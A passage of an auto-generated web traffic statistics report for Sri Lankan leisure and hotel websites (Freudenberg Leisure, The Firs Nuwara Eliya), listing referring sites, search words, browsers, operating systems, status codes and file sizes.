<tr><td class="R">370</td><td class="xl">https://firs.freudenbergleisure.lk/</td></tr>
<tr><td class="R">253</td><td class="xl">https://www.facebook.com/</td></tr>
<tr><td class="R">206</td><td class="xl">http://fsalk.com/</td></tr>
<tr><td class="R">197</td><td class="xl">http://thefirsboutiques.com/</td></tr>
<tr><td class="R">154</td><td class="xl">http://www.fsalk.com/</td></tr>
<tr><td class="R">142</td><td class="xl">http://freudenbergleisure.com/</td></tr>
<tr><td class="R">142</td><td class="xl">https://www.thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">137</td><td class="xl">https://www.google.co.in/</td></tr>
<tr><td class="R">132</td><td class="xl">http://www.google.com/</td></tr>
<tr><td class="R">115</td><td class="xl">https://www.bing.com/</td></tr>
<tr><td class="R">115</td><td class="xl">https://thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">112</td><td class="xl">http://freudenbergleisure.lk/</td></tr>
<tr><td class="R">107</td><td class="xl">http://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">94</td><td class="xl">https://freudenbergleisure.lk/</td></tr>
<tr><td class="R">93</td><td class="xl">http://firs.freudenbergleisure.com/</td></tr>
<tr><td class="R">88</td><td class="xl">https://fsalk.com/</td></tr>
<tr><td class="R">87</td><td class="xl">http://www.fsaleisure.com/</td></tr>
<tr><td class="R">86</td><td class="xl">https://www.freudenbergleisure.lk/</td></tr>
<tr><td class="R">76</td><td class="xl">http://fsaleisure.com/</td></tr>
<tr><td class="R">69</td><td class="xl">https://uptime.com/</td></tr>
<tr><td class="R">65</td><td class="xl">https://www.fsalk.com/</td></tr>
<tr><td class="R">1915</td><td class="xl">[not listed: 398 sites]</td></tr>
</tbody></table>
</div><div class="searchw"><h2><a name="searchw" id="searchw">Search Word Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Search Word Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./searchw.png" alt="" /></p>
<p class="whatinc">
Listing query words, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">search term</th></tr></thead>
<tbody><tr><td class="R">3</td><td class="xl">nuwara</td></tr>
<tr><td class="R">3</td><td class="xl">eliya</td></tr>
<tr><td class="R">2</td><td class="xl">firs</td></tr>
<tr><td class="R">1</td><td class="xl">the</td></tr>
<tr><td class="R">1</td><td class="xl">lucksery</td></tr>
<tr><td class="R">1</td><td class="xl">banglow</td></tr>
<tr><td class="R">1</td><td class="xl">church</td></tr>
<tr><td class="R">1</td><td class="xl">welisara</td></tr>
<tr><td class="R">1</td><td class="xl">bungalows</td></tr>
<tr><td class="R">1</td><td class="xl">semi</td></tr>
<tr><td class="R">1</td><td class="xl">in</td></tr>
<tr><td class="R">1</td><td class="xl">hotels</td></tr>
</tbody></table>
</div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browrep.png" alt="" /></p>
<p class="whatinc">
Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="R">5417</td><td class="P">1525</td><td class="xl">Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)</td></tr>
<tr><td class="R">3187</td><td class="P">1309</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">2147</td><td class="P">961</td><td class="xl">Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)</td></tr>
<tr><td class="R">1048</td><td class="P">724</td><td class="xl">Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)</td></tr>
<tr><td class="R">678</td><td class="P">678</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1</td></tr>
<tr><td class="R">749</td><td class="P">565</td><td class="xl">Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)</td></tr>
<tr><td class="R">1408</td><td class="P">384</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36</td></tr>
<tr><td class="R">417</td><td class="P">344</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon</td></tr>
<tr><td class="R">4938</td><td class="P">339</td><td class="xl">Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36</td></tr>
<tr><td class="R">4947</td><td class="P">334</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34</td></tr>
<tr><td class="R">331</td><td class="P">312</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36</td></tr>
<tr><td class="R">304</td><td class="P">302</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider</td></tr>
<tr><td class="R">285</td><td class="P">285</td><td class="xl">Apache-HttpClient/4.5.2 (Java/1.8.0_151)</td></tr>
<tr><td class="R">269</td><td class="P">269</td><td class="xl">Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)</td></tr>
<tr><td class="R">294</td><td class="P">245</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36</td></tr>
<tr><td class="R">271</td><td class="P">240</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="R">313</td><td class="P">228</td><td class="xl">Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)</td></tr>
<tr><td class="R">591</td><td class="P">208</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36</td></tr>
<tr><td class="R">786</td><td class="P">194</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</td></tr>
<tr><td class="R">228</td><td class="P">194</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36</td></tr>
<tr><td class="R">621</td><td class="P">159</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36</td></tr>
<tr><td class="R">154</td><td class="P">154</td><td class="xl">Ruby</td></tr>
<tr><td class="R">589</td><td class="P">128</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36</td></tr>
<tr><td class="R">204</td><td class="P">127</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">410</td><td class="P">127</td><td class="xl">Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)</td></tr>
<tr><td class="R">122</td><td class="P">122</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr>
<tr><td class="R">359</td><td class="P">120</td><td class="xl">Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)</td></tr>
<tr><td class="R">115</td><td class="P">115</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36</td></tr>
<tr><td class="R">115</td><td class="P">115</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36</td></tr>
<tr><td class="R">111</td><td class="P">111</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36</td></tr>
<tr><td class="R">109</td><td class="P">109</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36</td></tr>
<tr><td class="R">107</td><td class="P">107</td><td class="xl">Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online)</td></tr>
<tr><td class="R">109</td><td class="P">107</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0</td></tr>
<tr><td class="R">245</td><td class="P">103</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36</td></tr>
<tr><td class="R">103</td><td class="P">103</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) Trident/5.0 Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41</td></tr>
<tr><td class="R">411</td><td class="P">101</td><td class="xl">Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1</td></tr>
<tr><td class="R">320</td><td class="P">100</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36</td></tr>
<tr><td class="R">802</td><td class="P">99</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko</td></tr>
<tr><td class="R">321</td><td class="P">97</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36</td></tr>
<tr><td class="R">97</td><td class="P">97</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Trident/5.0 Chrome/67.0.3396.79 Safari/537.36</td></tr>
<tr><td class="R">47804</td><td class="P">13259</td><td class="xl">[not listed: 2,518 browsers]</td></tr>
</tbody></table>
</div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./browsum.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 browsers by the number of requests for pages, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">47817</td><td class="P">12977</td><td class="xl">Safari</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">38676</td><td class="P">11032</td><td class="xl">&nbsp;&nbsp;Safari/537</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1259</td><td class="P">810</td><td class="xl">&nbsp;&nbsp;Safari/602</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">4333</td><td class="P">499</td><td class="xl">&nbsp;&nbsp;Safari/604</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1075</td><td class="P">126</td><td class="xl">&nbsp;&nbsp;Safari/605</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">864</td><td class="P">107</td><td class="xl">&nbsp;&nbsp;Safari/535</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">367</td><td class="P">100</td><td class="xl">&nbsp;&nbsp;Safari/600</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">186</td><td class="P">96</td><td class="xl">&nbsp;&nbsp;Safari/534</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">191</td><td class="P">89</td><td class="xl">&nbsp;&nbsp;Safari/601</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">239</td><td class="P">32</td><td class="xl">&nbsp;&nbsp;Safari/603</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">30</td><td class="P">24</td><td class="xl">&nbsp;&nbsp;Safari/533</td></tr>
<tr><td class="N">2</td><td class="R">18822</td><td class="P">5830</td><td class="xl">Netscape (compatible)</td></tr>
<tr><td class="N">3</td><td class="R">6360</td><td class="P">2802</td><td class="xl">Firefox</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">737</td><td class="P">737</td><td class="xl">&nbsp;&nbsp;Firefox/42</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">689</td><td class="P">683</td><td class="xl">&nbsp;&nbsp;Firefox/40</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">220</td><td class="P">217</td><td class="xl">&nbsp;&nbsp;Firefox/45</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">520</td><td class="P">97</td><td class="xl">&nbsp;&nbsp;Firefox/59</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">105</td><td class="P">91</td><td class="xl">&nbsp;&nbsp;Firefox/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">654</td><td class="P">86</td><td class="xl">&nbsp;&nbsp;Firefox/50</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">102</td><td class="P">83</td><td class="xl">&nbsp;&nbsp;Firefox/56</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">99</td><td class="P">78</td><td class="xl">&nbsp;&nbsp;Firefox/27</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">468</td><td class="P">67</td><td class="xl">&nbsp;&nbsp;Firefox/61</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">203</td><td class="P">65</td><td class="xl">&nbsp;&nbsp;Firefox/62</td></tr>
<tr><td class="N">4</td><td class="R">1897</td><td class="P">1183</td><td class="xl">MSIE</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">863</td><td class="P">720</td><td class="xl">&nbsp;&nbsp;MSIE/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">203</td><td class="P">139</td><td class="xl">&nbsp;&nbsp;MSIE/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">355</td><td class="P">122</td><td class="xl">&nbsp;&nbsp;MSIE/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">109</td><td class="P">106</td><td class="xl">&nbsp;&nbsp;MSIE/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">177</td><td class="P">52</td><td class="xl">&nbsp;&nbsp;MSIE/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">161</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;MSIE/10</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">11</td><td class="P">11</td><td class="xl">&nbsp;&nbsp;MSIE/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;MSIE/3</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;MSIE/2</td></tr>
<tr><td class="N">5</td><td class="R">3635</td><td class="P">442</td><td class="xl">Mozilla</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">8</td><td class="P">8</td><td class="xl">&nbsp;&nbsp;Mozilla/0</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">3</td><td class="P">3</td><td class="xl">&nbsp;&nbsp;Mozilla/1</td></tr>
<tr><td class="N">6</td><td class="R">429</td><td class="P">423</td><td class="xl">Apache-HttpClient</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">429</td><td class="P">423</td><td class="xl">&nbsp;&nbsp;Apache-HttpClient/4</td></tr>
<tr><td class="N">7</td><td class="R">420</td><td class="P">248</td><td class="xl">Opera</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">254</td><td class="P">90</td><td class="xl">&nbsp;&nbsp;Opera/9</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">97</td><td class="P">89</td><td class="xl">&nbsp;&nbsp;Opera/8</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">52</td><td class="P">52</td><td class="xl">&nbsp;&nbsp;Opera/7</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;Opera/6</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1</td><td class="P">1</td><td class="xl">&nbsp;&nbsp;Opera/10</td></tr>
<tr><td class="N">8</td><td class="R">271</td><td class="P">240</td><td class="xl">ZoominfoBot (zoominfobot at zoominfo dot com)</td></tr>
<tr><td class="N">9</td><td class="R">313</td><td class="P">228</td><td class="xl">Sogou web spider</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">313</td><td class="P">228</td><td class="xl">&nbsp;&nbsp;Sogou web spider/4</td></tr>
<tr><td class="N">10</td><td class="R">154</td><td class="P">154</td><td class="xl">Ruby</td></tr>
<tr><td class="N">11</td><td class="R">332</td><td class="P">122</td><td class="xl">python-requests</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">332</td><td class="P">122</td><td class="xl">&nbsp;&nbsp;python-requests/2</td></tr>
<tr><td class="N">12</td><td class="R">78</td><td class="P">73</td><td class="xl">Go-http-client</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">58</td><td class="P">58</td><td class="xl">&nbsp;&nbsp;Go-http-client/1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">20</td><td class="P">15</td><td class="xl">&nbsp;&nbsp;Go-http-client/2</td></tr>
<tr><td class="N">13</td><td class="R">58</td><td class="P">58</td><td class="xl">Netscape</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">38</td><td class="P">38</td><td class="xl">&nbsp;&nbsp;Netscape/4</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13</td><td class="P">13</td><td class="xl">&nbsp;&nbsp;Netscape/5</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">4</td><td class="P">4</td><td class="xl">&nbsp;&nbsp;Netscape/3</td></tr>
<tr><td class="N">14</td><td class="R">157</td><td class="P">42</td><td class="xl">MauiBot (crawler.feedback+wc@gmail.com)</td></tr>
<tr><td class="N">15</td><td class="R">74</td><td class="P">33</td><td class="xl">ia_archiver</td></tr>
<tr><td class="N">16</td><td class="R">159</td><td class="P">33</td><td class="xl">CCBot</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">159</td><td class="P">33</td><td class="xl">&nbsp;&nbsp;CCBot/2</td></tr>
<tr><td class="N">17</td><td class="R">28</td><td class="P">28</td><td class="xl">OrgProbe</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">28</td><td class="P">28</td><td class="xl">&nbsp;&nbsp;OrgProbe/2</td></tr>
<tr><td class="N">18</td><td class="R">26</td><td class="P">23</td><td class="xl">curl</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">26</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;curl/7</td></tr>
<tr><td class="N">19</td><td class="R">35</td><td class="P">21</td><td class="xl">WhatsApp</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">28</td><td class="P">16</td><td class="xl">&nbsp;&nbsp;WhatsApp/2</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7</td><td class="P">5</td><td class="xl">&nbsp;&nbsp;WhatsApp/0</td></tr>
<tr><td class="N">20</td><td class="R">32</td><td class="P">13</td><td class="xl">YisouSpider</td></tr>
<tr><td class="N">&nbsp;</td><td class="R">739</td><td class="P">227</td><td class="xl">[not listed: 75 browsers]</td></tr>
</tbody></table>
</div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./os.png" alt="" /></p>
<p class="whatinc">
Listing operating systems, sorted by the number of requests for pages.</p>
<table>
<thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead>
<tbody><tr><td class="N">1</td><td class="R">30986</td><td class="P">10329</td><td class="xl">Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16215</td><td class="P">5305</td><td class="xl">&nbsp;&nbsp;Unknown Windows</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">13121</td><td class="P">3712</td><td class="xl">&nbsp;&nbsp;Windows NT</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">1287</td><td class="P">960</td><td class="xl">&nbsp;&nbsp;Windows XP</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">180</td><td class="P">169</td><td class="xl">&nbsp;&nbsp;Windows 2000</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">84</td><td class="P">84</td><td class="xl">&nbsp;&nbsp;Windows Server 2003</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">50</td><td class="P">50</td><td class="xl">&nbsp;&nbsp;Windows 95</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">23</td><td class="P">23</td><td class="xl">&nbsp;&nbsp;Windows 98</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">17</td><td class="P">17</td><td class="xl">&nbsp;&nbsp;Windows ME</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">7</td><td class="P">7</td><td class="xl">&nbsp;&nbsp;Windows 3.1</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;Windows CE</td></tr>
<tr><td class="N">2</td><td class="R">19526</td><td class="P">6141</td><td class="xl">OS unknown</td></tr>
<tr><td class="N">3</td><td class="R">16897</td><td class="P">4241</td><td class="xl">Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16879</td><td class="P">4235</td><td class="xl">&nbsp;&nbsp;Linux</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">16</td><td class="P">4</td><td class="xl">&nbsp;&nbsp;Other Unix</td></tr>
<tr class="sub level2"><td class="N">&nbsp;</td><td class="R">2</td><td class="P">2</td><td class="xl">&nbsp;&nbsp;BSD</td></tr>
<tr><td class="N">4</td><td class="R">10865</td><td class="P">2755</td><td class="xl">Macintosh</td></tr>
<tr><td class="N">5</td><td class="R">3562</td><td class="P">1734</td><td class="xl">Known robots</td></tr>
</tbody></table>
</div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./code.png" alt="" /></p>
<p class="whatinc">
Listing status codes, sorted numerically.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead>
<tbody><tr><td class="R">78226</td><td class="xl">200 OK</td></tr>
<tr><td class="R">3</td><td class="xl">206 Partial content</td></tr>
<tr><td class="R">457</td><td class="xl">301 Document moved permanently</td></tr>
<tr><td class="R">35787</td><td class="xl">302 Document found elsewhere</td></tr>
<tr><td class="R">4124</td><td class="xl">304 Not modified since last retrieval</td></tr>
</tbody></table>
</div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./size.png" alt="" /></p>
<table>
<thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead>
<tbody><tr><td class="x">          0</td><td class="R">4466</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">   1B-  10B</td><td class="R">4</td><td class="b">&nbsp;</td></tr>
<tr><td class="x">  11B- 100B</td><td class="R">179</td><td class="b">&nbsp;</td></tr>
<tr><td class="x"> 101B-  1kB</td><td class="R">3695</td><td class="b"> 0.08%</td></tr>
<tr><td class="x">  1kB- 10kB</td><td class="R">16088</td><td class="b"> 2.35%</td></tr>
<tr><td class="x"> 10kB-100kB</td><td class="R">55122</td><td class="b">66.67%</td></tr>
<tr><td class="x">100kB-  1MB</td><td class="R">2796</td><td class="b">30.74%</td></tr>
<tr><td class="x">  1MB- 10MB</td><td class="R">3</td><td class="b"> 0.16%</td></tr>
</tbody></table>
</div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./type.png" alt="" /></p>
<p class="whatinc">
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead>
<tbody><tr><td class="R">18522</td><td class="b">32.81%</td><td class="xl">.js   [JavaScript code]</td></tr>
